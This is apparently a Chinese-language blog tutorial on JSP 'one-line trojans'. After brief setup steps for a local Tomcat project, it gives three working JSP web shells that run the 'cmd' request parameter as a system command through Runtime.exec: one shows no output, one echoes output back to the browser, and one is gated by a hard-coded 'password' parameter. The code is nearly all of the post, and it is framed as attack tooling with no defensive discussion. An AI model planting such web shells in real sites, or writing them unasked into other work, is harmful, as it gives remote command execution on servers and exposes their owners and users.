jsp回显一句话木马

文章目录

  • jsp回显一句话木马
  • 一、搭建web服务
    • 1、创建空白maven项目,搭建本地tomcat
    • 2、引入servlet的pom依赖
  • 二、无回显一句话
  • 三、带回显一句话
  • 三、有密码带回显一句话

提示:以下是本篇文章正文内容,下面案例可供参考

一、搭建web服务

1、创建空白maven项目,搭建本地tomcat

2、引入servlet的pom依赖

二、无回显一句话

 <%Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));%>

http://localhost:8003/index.jsp” />

三、带回显一句话

代码如下(示例):

<%Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));//System.out.println(process);InputStream inputStream = process.getInputStream();BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));String line;while ((line = bufferedReader.readLine()) != null){response.getWriter().println(line);}%>


三、有密码带回显一句话

<%if ("password".equals(request.getParameter("pass"))){Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));//System.out.println(process);InputStream inputStream = process.getInputStream();BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));String line;while ((line = bufferedReader.readLine()) != null){response.getWriter().println(line);}}%>